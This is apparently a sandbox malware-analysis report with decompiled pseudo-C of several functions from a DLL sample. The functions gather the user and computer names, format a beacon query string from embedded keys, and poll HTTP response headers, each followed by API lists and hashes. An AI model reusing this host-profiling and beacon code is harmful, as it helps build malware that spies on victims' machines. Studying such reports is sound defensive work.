                                				void* _t164;
                                				long _t165;
                                				intOrPtr* _t166;
                                				intOrPtr* _t167;
                                				intOrPtr _t168;
                                				intOrPtr* _t171;
                                				char** _t174;
                                				char** _t176;
                                				char** _t177;
                                				void* _t182;
                                
                                				_t66 = __eax;
                                				_t174 =  &_v16;
                                				_t145 = _a20;
                                				_a20 = 8;
                                				if(__eax == 0) {
                                					_t66 = GetTickCount();
                                				}
                                				_t67 =  *0x106a018; // 0xd96449c3
                                				asm("bswap eax");
                                				_t68 =  *0x106a014; // 0x3a87c8cd
                                				asm("bswap eax");
                                				_t69 = E0106A010; // 0xd8d2f808
                                				asm("bswap eax");
                                				_t70 =  *0x106a00c; // 0x8f8f86c2
                                				asm("bswap eax");
                                				_t71 =  *0x106a348; // 0x409d5a8
                                				_t3 = _t71 + 0x106b62b; // 0x74666f73
                                				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x106a02c,  *0x106a004, _t66);
                                				_t74 = E01066927();
                                				_t75 =  *0x106a348; // 0x409d5a8
                                				_t4 = _t75 + 0x106b66b; // 0x74707526
                                				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
                                				_t176 =  &(_t174[0xe]);
                                				_t163 = _t162 + _t78;
                                				if(_a24 != 0) {
                                					_t141 =  *0x106a348; // 0x409d5a8
                                					_t8 = _t141 + 0x106b676; // 0x732526
                                					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
                                					_t176 =  &(_t176[3]);
                                					_t163 = _t163 + _t144;
                                				}
                                				_t79 =  *0x106a348; // 0x409d5a8
                                				_t10 = _t79 + 0x106b78e; // 0x5108d36
                                				_t182 = _a20 - _t10;
                                				_t12 = _t79 + 0x106b2de; // 0x74636126
                                				_t157 = 0 | _t182 == 0x00000000;
                                				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
                                				_t177 =  &(_t176[3]);
                                				_t164 = _t163 + _t82;
                                				_t83 = E010622D7(_t10);
                                				_a32 = _t83;
                                				if(_t83 != 0) {
                                					_t136 =  *0x106a348; // 0x409d5a8
                                					_t17 = _t136 + 0x106b8d0; // 0x736e6426
                                					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
                                					_t177 =  &(_t177[3]);
                                					_t164 = _t164 + _t139;
                                					HeapFree( *0x106a2d8, 0, _a40);
                                				}
                                				_t84 = E01062A11();
                                				_a32 = _t84;
                                				if(_t84 != 0) {
                                					_t132 =  *0x106a348; // 0x409d5a8
                                					_t21 = _t132 + 0x106b8d8; // 0x6f687726
                                					wsprintfA(_t164 + _t145, _t21, _t84);
                                					_t177 =  &(_t177[3]);
                                					HeapFree( *0x106a2d8, 0, _a40);
                                				}
                                				_t159 =  *0x106a3cc; // 0x51095b0
                                				_t86 = E01062509(0x106a00a, _t159 + 4);
                                				_t165 = 0;
                                				_a16 = _t86;
                                				if(_t86 == 0) {
                                					L28:
                                					HeapFree( *0x106a2d8, _t165, _t145);
                                					return _a44;
                                				} else {
                                					_t89 = RtlAllocateHeap( *0x106a2d8, 0, 0x800);
                                					_a24 = _t89;
                                					if(_t89 == 0) {
                                						L27:
                                						HeapFree( *0x106a2d8, _t165, _a8);
                                						goto L28;
                                					}
                                					E01061BE9(GetTickCount());
                                					_t93 =  *0x106a3cc; // 0x51095b0
                                					__imp__(_t93 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t97 =  *0x106a3cc; // 0x51095b0
                                					__imp__(_t97 + 0x40);
                                					_t99 =  *0x106a3cc; // 0x51095b0
                                					_t161 = E01061D33(1, _t157, _t145,  *_t99);
                                					asm("lock xadd [eax], ecx");
                                					if(_t161 == 0) {
                                						L26:
                                						HeapFree( *0x106a2d8, _t165, _a16);
                                						goto L27;
                                					}
                                					StrTrimA(_t161, 0x106928c);
                                					_push(_t161);
                                					_t105 = E0106393C();
                                					_v12 = _t105;
                                					if(_t105 == 0) {
                                						L25:
                                						HeapFree( *0x106a2d8, _t165, _t161);
                                						goto L26;
                                					}
                                					_t166 = __imp__;
                                					 *_t166(_t161, _a8);
                                					 *_t166(_a4, _v12);
                                					_t167 = __imp__;
                                					 *_t167(_v4, _v24);
                                					_t168 = E010661FC( *_t167(_v12, _t161), _v20);
                                					_v36 = _t168;
                                					if(_t168 == 0) {
                                						_v8 = 8;
                                						L23:
                                						E0106561E();
                                						L24:
                                						HeapFree( *0x106a2d8, 0, _v40);
                                						_t165 = 0;
                                						goto L25;
                                					}
                                					_t115 = E010610B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
                                					_v12 = _t115;
                                					if(_t115 == 0) {
                                						_t171 = _v24;
                                						_v20 = E01065B9D(_t171, _t168, _v16, _v12);
                                						_t123 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                						_t125 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                						_t127 =  *((intOrPtr*)(_t171 + 4));
                                						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                						_t129 =  *_t171;
                                						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                						E01066C2C(_t171);
                                					}
                                					if(_v8 != 0x10d2) {
                                						L18:
                                						if(_v8 == 0) {
                                							_t117 = _v16;
                                							if(_t117 != 0) {
                                								_t118 =  *_t117;
                                								_t169 =  *_v12;
                                								_v16 = _t118;
                                								wcstombs(_t118, _t118,  *_v12);
                                								 *_v24 = E01063C22(_v16, _v16, _t169 >> 1);
                                							}
                                						}
                                						goto L21;
                                					} else {
                                						if(_v16 != 0) {
                                							L21:
                                							E01066C2C(_v32);
                                							if(_v12 == 0 || _v8 == 0x10d2) {
                                								goto L24;
                                							} else {
                                								goto L23;
                                							}
                                						}
                                						_v8 = _v8 & 0x00000000;
                                						goto L18;
                                					}
                                				}
                                			}




























































                                0x0106300e
                                0x0106300e
                                0x01063012
                                0x01063019
                                0x01063023
                                0x01063025
                                0x01063025
                                0x01063032
                                0x0106303d
                                0x01063040
                                0x0106304b
                                0x0106304e
                                0x01063053
                                0x01063056
                                0x0106305b
                                0x0106305e
                                0x0106306a
                                0x01063077
                                0x01063079
                                0x0106307f
                                0x01063084
                                0x0106308f
                                0x01063091
                                0x01063094
                                0x0106309b
                                0x0106309d
                                0x010630a6
                                0x010630b1
                                0x010630b3
                                0x010630b6
                                0x010630b6
                                0x010630b8
                                0x010630bd
                                0x010630c5
                                0x010630c9
                                0x010630cf
                                0x010630d8
                                0x010630da
                                0x010630dd
                                0x010630df
                                0x010630ea
                                0x010630f0
                                0x010630f3
                                0x010630f8
                                0x01063103
                                0x01063105
                                0x0106310c
                                0x01063116
                                0x01063116
                                0x01063118
                                0x0106311d
                                0x01063123
                                0x01063126
                                0x0106312b
                                0x01063135
                                0x01063137
                                0x01063146
                                0x01063146
                                0x01063148
                                0x01063156
                                0x0106315b
                                0x0106315d
                                0x01063163
                                0x01063343
                                0x0106334b
                                0x01063358
                                0x01063169
                                0x01063175
                                0x0106317b
                                0x01063181
                                0x01063336
                                0x01063341
                                0x00000000
                                0x01063341
                                0x0106318d
                                0x01063192
                                0x0106319b
                                0x010631ac
                                0x010631b0
                                0x010631b9
                                0x010631bf
                                0x010631cc
                                0x010631d9
                                0x010631df
                                0x01063329
                                0x01063334
                                0x00000000
                                0x01063334
                                0x010631eb
                                0x010631f1
                                0x010631f2
                                0x010631f7
                                0x010631fd
                                0x0106331f
                                0x01063327
                                0x00000000
                                0x01063327
                                0x01063207
                                0x0106320e
                                0x01063218
                                0x0106321e
                                0x01063228
                                0x0106323a
                                0x0106323c
                                0x01063242
                                0x0106335b
                                0x0106330a
                                0x0106330a
                                0x0106330f
                                0x0106331b
                                0x0106331d
                                0x00000000
                                0x0106331d
                                0x0106324d
                                0x01063252
                                0x01063258
                                0x01063263
                                0x0106326e
                                0x01063272
                                0x01063278
                                0x0106327e
                                0x01063284
                                0x01063287
                                0x0106328d
                                0x01063290
                                0x01063295
                                0x01063299
                                0x01063299
                                0x010632a6
                                0x010632b4
                                0x010632b9
                                0x010632bb
                                0x010632c1
                                0x010632c7
                                0x010632c9
                                0x010632ce
                                0x010632d2
                                0x010632ee
                                0x010632ee
                                0x010632c1
                                0x00000000
                                0x010632a8
                                0x010632ad
                                0x010632f0
                                0x010632f4
                                0x010632fe
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x010632fe
                                0x010632af
                                0x00000000
                                0x010632af
                                0x010632a6

                                APIs
                                • GetTickCount.KERNEL32 ref: 01063025
                                • wsprintfA.USER32 ref: 01063072
                                • wsprintfA.USER32 ref: 0106308F
                                • wsprintfA.USER32 ref: 010630B1
                                • wsprintfA.USER32 ref: 010630D8
                                • wsprintfA.USER32 ref: 01063103
                                • HeapFree.KERNEL32(00000000,?), ref: 01063116
                                • wsprintfA.USER32 ref: 01063135
                                • HeapFree.KERNEL32(00000000,?), ref: 01063146
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01063175
                                • GetTickCount.KERNEL32 ref: 01063187
                                • RtlEnterCriticalSection.NTDLL(05109570), ref: 0106319B
                                • RtlLeaveCriticalSection.NTDLL(05109570), ref: 010631B9
                                  • Part of subcall function 01061D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7477C740,010658D7,00000000,051095B0), ref: 01061D5E
                                  • Part of subcall function 01061D33: lstrlen.KERNEL32(00000000,?,7477C740,010658D7,00000000,051095B0), ref: 01061D66
                                  • Part of subcall function 01061D33: strcpy.NTDLL ref: 01061D7D
                                  • Part of subcall function 01061D33: lstrcat.KERNEL32(00000000,00000000), ref: 01061D88
                                  • Part of subcall function 01061D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010658D7,?,7477C740,010658D7,00000000,051095B0), ref: 01061DA5
                                • StrTrimA.SHLWAPI(00000000,0106928C,?,051095B0), ref: 010631EB
                                  • Part of subcall function 0106393C: lstrlen.KERNEL32(05109B68,00000000,00000000,00000000,01065902,00000000), ref: 0106394C
                                  • Part of subcall function 0106393C: lstrlen.KERNEL32(?), ref: 01063954
                                  • Part of subcall function 0106393C: lstrcpy.KERNEL32(00000000,05109B68), ref: 01063968
                                  • Part of subcall function 0106393C: lstrcat.KERNEL32(00000000,?), ref: 01063973
                                • lstrcpy.KERNEL32(00000000,?), ref: 0106320E
                                • lstrcpy.KERNEL32(?,?), ref: 01063218
                                • lstrcat.KERNEL32(?,?), ref: 01063228
                                • lstrcat.KERNEL32(?,00000000), ref: 0106322F
                                  • Part of subcall function 010661FC: lstrlen.KERNEL32(?,00000000,05109D70,00000000,010639E8,05109F93,69B25F44,?,?,?,?,69B25F44,00000005,0106A00C,4D283A53,?), ref: 01066203
                                  • Part of subcall function 010661FC: mbstowcs.NTDLL ref: 0106622C
                                  • Part of subcall function 010661FC: memset.NTDLL ref: 0106623E
                                • wcstombs.NTDLL ref: 010632D2
                                  • Part of subcall function 01065B9D: SysAllocString.OLEAUT32(?), ref: 01065BD8
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                • HeapFree.KERNEL32(00000000,?), ref: 0106331B
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01063327
                                • HeapFree.KERNEL32(00000000,?,?,051095B0), ref: 01063334
                                • HeapFree.KERNEL32(00000000,?), ref: 01063341
                                • HeapFree.KERNEL32(00000000,?), ref: 0106334B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 967369141-0
                                • Opcode ID: 31a7fc2c503d47c49b655fdc157e15a5859e6b5829ed77d8992f965b006f440d
                                • Instruction ID: 130e34792308e874fe99ab8d3ea2bab6e5180e47c9745d5052e307490e0395f9
                                • Opcode Fuzzy Hash: 31a7fc2c503d47c49b655fdc157e15a5859e6b5829ed77d8992f965b006f440d
                                • Instruction Fuzzy Hash: F3A18A71600215EFD761AF68DC48E9A7BE8FF88714F044928F5C9EB220DB3AD944CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 55%
                                			E010662F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				char _v20;
                                				WCHAR* _v24;
                                				signed int _v28;
                                				intOrPtr _v32;
                                				void* __edi;
                                				void* __esi;
                                				WCHAR* _t58;
                                				signed int _t60;
                                				signed int _t62;
                                				intOrPtr _t64;
                                				intOrPtr _t66;
                                				intOrPtr _t70;
                                				void* _t72;
                                				void* _t75;
                                				void* _t76;
                                				WCHAR* _t80;
                                				WCHAR* _t83;
                                				void* _t84;
                                				void* _t85;
                                				void* _t86;
                                				intOrPtr _t92;
                                				signed int _t103;
                                				void* _t104;
                                				intOrPtr _t105;
                                				void* _t107;
                                				intOrPtr* _t115;
                                				void* _t119;
                                				WCHAR* _t125;
                                
                                				_t58 =  *0x106a3dc; // 0x5109c18
                                				_v24 = _t58;
                                				_v28 = 8;
                                				_v20 = GetTickCount();
                                				_t60 = E01067367();
                                				_t103 = 5;
                                				_t98 = _t60 % _t103 + 6;
                                				_t62 = E01067367();
                                				_t117 = _t62 % _t103 + 6;
                                				_v32 = _t62 % _t103 + 6;
                                				_t64 = E0106117A(_t60 % _t103 + 6);
                                				_v16 = _t64;
                                				if(_t64 != 0) {
                                					_t66 = E0106117A(_t117);
                                					_v12 = _t66;
                                					if(_t66 != 0) {
                                						_push(5);
                                						_t104 = 0xa;
                                						_t119 = E010667E7(_t104,  &_v20);
                                						if(_t119 == 0) {
                                							_t119 = 0x106918c;
                                						}
                                						_t70 = E0106659E(_v24);
                                						_v8 = _t70;
                                						if(_t70 != 0) {
                                							_t115 = __imp__;
                                							_t72 =  *_t115(_t119);
                                							_t75 =  *_t115(_v8);
                                							_t76 =  *_t115(_a4);
                                							_t80 = E01066D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                                							_v24 = _t80;
                                							if(_t80 != 0) {
                                								_t105 =  *0x106a348; // 0x409d5a8
                                								_t28 = _t105 + 0x106bb30; // 0x530025
                                								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                                								_push(4);
                                								_t107 = 5;
                                								_t83 = E010667E7(_t107,  &_v20);
                                								_a8 = _t83;
                                								if(_t83 == 0) {
                                									_a8 = 0x1069190;
                                								}
                                								_t84 =  *_t115(_a8);
                                								_t85 =  *_t115(_v8);
                                								_t86 =  *_t115(_a4);
                                								_t125 = E01066D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                                								if(_t125 == 0) {
                                									E01066C2C(_v24);
                                								} else {
                                									_t92 =  *0x106a348; // 0x409d5a8
                                									_t44 = _t92 + 0x106bca8; // 0x73006d
                                									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                                									 *_a16 = _v24;
                                									_v28 = _v28 & 0x00000000;
                                									 *_a20 = _t125;
                                								}
                                							}
                                							E01066C2C(_v8);
                                						}
                                						E01066C2C(_v12);
                                					}
                                					E01066C2C(_v16);
                                				}
                                				return _v28;
                                			}


































                                0x010662fc
                                0x01066304
                                0x01066307
                                0x01066314
                                0x01066317
                                0x0106631e
                                0x01066325
                                0x01066328
                                0x01066335
                                0x01066338
                                0x0106633b
                                0x01066340
                                0x01066345
                                0x0106634d
                                0x01066352
                                0x01066357
                                0x0106635d
                                0x01066361
                                0x0106636a
                                0x0106636e
                                0x01066370
                                0x01066370
                                0x01066378
                                0x0106637d
                                0x01066382
                                0x01066388
                                0x0106638f
                                0x010663a0
                                0x010663a7
                                0x010663b9
                                0x010663be
                                0x010663c3
                                0x010663cc
                                0x010663de
                                0x010663f4
                                0x010663f9
                                0x010663fd
                                0x01066401
                                0x01066406
                                0x0106640b
                                0x0106640d
                                0x0106640d
                                0x01066417
                                0x01066420
                                0x01066427
                                0x01066443
                                0x01066447
                                0x01066480
                                0x01066449
                                0x0106644c
                                0x01066454
                                0x01066465
                                0x0106646d
                                0x01066475
                                0x01066479
                                0x01066479
                                0x01066447
                                0x01066488
                                0x01066488
                                0x01066490
                                0x01066490
                                0x01066498
                                0x01066498
                                0x010664a4

                                APIs
                                • GetTickCount.KERNEL32 ref: 0106630E
                                • lstrlen.KERNEL32(00000000,00000005), ref: 0106638F
                                • lstrlen.KERNEL32(?), ref: 010663A0
                                • lstrlen.KERNEL32(00000000), ref: 010663A7
                                • lstrlenW.KERNEL32(80000002), ref: 010663AE
                                • wsprintfW.USER32 ref: 010663F4
                                • lstrlen.KERNEL32(?,00000004), ref: 01066417
                                • lstrlen.KERNEL32(?), ref: 01066420
                                • lstrlen.KERNEL32(?), ref: 01066427
                                • lstrlenW.KERNEL32(?), ref: 0106642E
                                • wsprintfW.USER32 ref: 01066465
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                • String ID:
                                • API String ID: 822878831-0
                                • Opcode ID: f039abdece688f7862e834dfd3f2ba9a71c1c051866ef008f7991aa5e52d2f9b
                                • Instruction ID: 4fa895b52fa87cbd48df8b5f036713cb9e3d116c2a24260be72c058ef6c0a6a3
                                • Opcode Fuzzy Hash: f039abdece688f7862e834dfd3f2ba9a71c1c051866ef008f7991aa5e52d2f9b
                                • Instruction Fuzzy Hash: 47514A72D0021AEBCF12AFA4DC44ADE7BBAEF44354F058065F944AB260DB36DA15DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01064A85(void* __ecx, void* __esi) {
                                				long _v8;
                                				long _v12;
                                				long _v16;
                                				long _v20;
                                				long _t34;
                                				long _t39;
                                				long _t42;
                                				long _t56;
                                				void* _t58;
                                				void* _t59;
                                				void* _t61;
                                
                                				_t61 = __esi;
                                				_t59 = __ecx;
                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                				do {
                                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                					_v20 = _t34;
                                					if(_t34 != 0) {
                                						L3:
                                						_v8 = 4;
                                						_v16 = 0;
                                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                							_t39 = GetLastError();
                                							_v12 = _t39;
                                							if(_v20 == 0 || _t39 != 0x2ef3) {
                                								L15:
                                								return _v12;
                                							} else {
                                								goto L11;
                                							}
                                						}
                                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                							goto L11;
                                						} else {
                                							_v16 = 0;
                                							_v8 = 0;
                                							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                							_t58 = E01066D63(_v8 + 1);
                                							if(_t58 == 0) {
                                								_v12 = 8;
                                							} else {
                                								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                									E01066C2C(_t58);
                                									_v12 = GetLastError();
                                								} else {
                                									 *((char*)(_t58 + _v8)) = 0;
                                									 *(_t61 + 0xc) = _t58;
                                								}
                                							}
                                							goto L15;
                                						}
                                					}
                                					SetEvent( *(_t61 + 0x1c));
                                					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                					_v12 = _t56;
                                					if(_t56 != 0) {
                                						goto L15;
                                					}
                                					goto L3;
                                					L11:
                                					_t42 = E01066E40( *(_t61 + 0x1c), _t59, 0xea60);
                                					_v12 = _t42;
                                				} while (_t42 == 0);
                                				goto L15;
                                			}














                                0x01064a85
                                0x01064a85
                                0x01064a95
                                0x01064a98
                                0x01064a9c
                                0x01064aa2
                                0x01064aa7
                                0x01064ac0
                                0x01064ad4
                                0x01064adb
                                0x01064ae2
                                0x01064b35
                                0x01064b3b
                                0x01064b41
                                0x01064b7c
                                0x01064b82
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01064b41
                                0x01064ae8
                                0x00000000
                                0x01064aef
                                0x01064afd
                                0x01064b00
                                0x01064b03
                                0x01064b0f
                                0x01064b13
                                0x01064b75
                                0x01064b15
                                0x01064b27
                                0x01064b65
                                0x01064b70
                                0x01064b29
                                0x01064b2c
                                0x01064b30
                                0x01064b30
                                0x01064b27
                                0x00000000
                                0x01064b13
                                0x01064ae8
                                0x01064aac
                                0x01064ab2
                                0x01064ab5
                                0x01064aba
                                0x00000000
                                0x00000000
                                0x00000000
                                0x01064b4a
                                0x01064b52
                                0x01064b57
                                0x01064b5a
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76DC81D0,00000000,00000000), ref: 01064A9C
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?), ref: 01064AAC
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01064ADE
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01064B03
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01064B23
                                • GetLastError.KERNEL32 ref: 01064B35
                                  • Part of subcall function 01066E40: WaitForMultipleObjects.KERNEL32(00000002,01067BB5,00000000,01067BB5,?,?,?,01067BB5,0000EA60), ref: 01066E5B
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                • GetLastError.KERNEL32(00000000), ref: 01064B6A
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: 6947935cbcd45d44bfab50172f4132be31ad929eb451bc29201bf169f16a4760
                                • Instruction ID: 642850e2492eb2aea308077084f63b2437905932e3d64df2c0aae08ae319fcb5
                                • Opcode Fuzzy Hash: 6947935cbcd45d44bfab50172f4132be31ad929eb451bc29201bf169f16a4760
                                • Instruction Fuzzy Hash: 933112B5D00309EFEB21DFE5C884A9EBBFCEB08344F1049A9E682E2551D7759A44DF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01062A11() {
                                				long _v8;
                                				long _v12;
                                				int _v16;
                                				long _t39;
                                				long _t43;
                                				signed int _t47;
                                				short _t51;
                                				signed int _t52;
                                				int _t56;
                                				int _t57;
                                				char* _t64;
                                				short* _t67;
                                
                                				_v16 = 0;
                                				_v8 = 0;
                                				GetUserNameW(0,  &_v8);
                                				_t39 = _v8;
                                				if(_t39 != 0) {
                                					_v12 = _t39;
                                					_v8 = 0;
                                					GetComputerNameW(0,  &_v8);
                                					_t43 = _v8;
                                					if(_t43 != 0) {
                                						_t11 = _t43 + 2; // 0x7477c742
                                						_v12 = _v12 + _t11;
                                						_t64 = E01066D63(_v12 + _t11 << 2);
                                						if(_t64 != 0) {
                                							_t47 = _v12;
                                							_t67 = _t64 + _t47 * 2;
                                							_v8 = _t47;
                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                								L7:
                                								E01066C2C(_t64);
                                							} else {
                                								_t51 = 0x40;
                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                								_t52 = _v8;
                                								_v12 = _v12 - _t52;
                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                									goto L7;
                                								} else {
                                									_t56 = _v12 + _v8;
                                									_t31 = _t56 + 2; // 0x10657e9
                                									_v12 = _t56;
                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                									_v8 = _t57;
                                									if(_t57 == 0) {
                                										goto L7;
                                									} else {
                                										_t64[_t57] = 0;
                                										_v16 = _t64;
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v16;
                                			}















                                0x01062a1f
                                0x01062a22
                                0x01062a25
                                0x01062a2b
                                0x01062a30
                                0x01062a36
                                0x01062a3e
                                0x01062a41
                                0x01062a47
                                0x01062a4c
                                0x01062a55
                                0x01062a59
                                0x01062a66
                                0x01062a6a
                                0x01062a6c
                                0x01062a70
                                0x01062a73
                                0x01062a83
                                0x01062ad6
                                0x01062ad7
                                0x01062a85
                                0x01062a8a
                                0x01062a8b
                                0x01062a90
                                0x01062a93
                                0x01062aa6
                                0x00000000
                                0x01062aa8
                                0x01062aab
                                0x01062ab0
                                0x01062abe
                                0x01062ac1
                                0x01062ac7
                                0x01062acc
                                0x00000000
                                0x01062ace
                                0x01062ace
                                0x01062ad1
                                0x01062ad1
                                0x01062acc
                                0x01062aa6
                                0x01062adc
                                0x01062add
                                0x01062a4c
                                0x01062ae3

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,010657E7), ref: 01062A25
                                • GetComputerNameW.KERNEL32(00000000,010657E7), ref: 01062A41
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • GetUserNameW.ADVAPI32(00000000,010657E7), ref: 01062A7B
                                • GetComputerNameW.KERNEL32(010657E7,7477C740), ref: 01062A9E
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,010657E7,00000000,010657E9,00000000,00000000,?,7477C740,010657E7), ref: 01062AC1
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: e4a70d4c6be99d6a10aeb6a3a42e649dae0ce110ca373837f6cc6fd9fe5242d4
                                • Instruction ID: a400a98dbdb188eef78c19b31435f03e1f2d028ec6058eb0537de9559a74520b
                                • Opcode Fuzzy Hash: e4a70d4c6be99d6a10aeb6a3a42e649dae0ce110ca373837f6cc6fd9fe5242d4
                                • Instruction Fuzzy Hash: 0F210A76900209FFDB21DFE8D9848EEBBBCFF44300B1044AAE641E7244E6749B44CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E01062732(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				short _t67;
                                				intOrPtr* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t72;
                                				intOrPtr* _t75;
                                				intOrPtr* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t83;
